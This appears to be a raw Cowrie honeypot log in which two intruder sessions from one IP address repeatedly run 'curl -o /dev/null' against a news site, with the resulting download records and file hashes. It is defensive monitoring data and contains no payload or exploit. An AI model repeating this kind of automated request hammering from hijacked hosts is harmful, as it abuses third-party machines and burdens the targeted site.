{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.072060Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:48.097644Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.098898Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:48.110072Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.111462Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.117957Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.119449Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:48.140429Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.141688Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.150988Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.157331Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:48.158849Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.160020Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:48.189653Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.190971Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.194956Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.201587Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:48.206794Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.208049Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.231228Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.234280Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:48.240506Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.241589Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.252455Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:48.254585Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.255711Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.257845Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.265569Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.267779Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:48.275481Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.276494Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.283659Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:48.293778Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.295053Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.308650Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:48.310524Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.311663Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.319277Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.328614Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:48.334509Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.335809Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.340930Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:48.347257Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.348446Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.360389Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.361717Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:48.374638Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.376134Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:48.382617Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.383753Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.412708Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:48.420712Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.421942Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:48.425551Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.426615Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.433947Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.452855Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:48.459208Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.460354Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:48.463108Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.464020Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:48.498324Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.499744Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:48.503138Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.504360Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.530958Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.532732Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:48.537891Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.538914Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:48.543139Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.544112Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:48.574189Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.575701Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.577676Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.580739Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:48.583371Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.584526Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.612132Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:48.613162Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.614307Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:48.620944Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.622090Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:48.649207Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.650260Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:48.658268Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.659459Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:48.685415Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.686832Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:48.697790Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.699023Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.712447Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:48.722052Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.723464Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:48.737329Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.738757Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:48.761687Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.763101Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.773880Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:48.776551Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.777526Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.780698Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:48.802271Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:48.804273Z","src_ip":"212.227.125.160","session":"7541ed730449"}
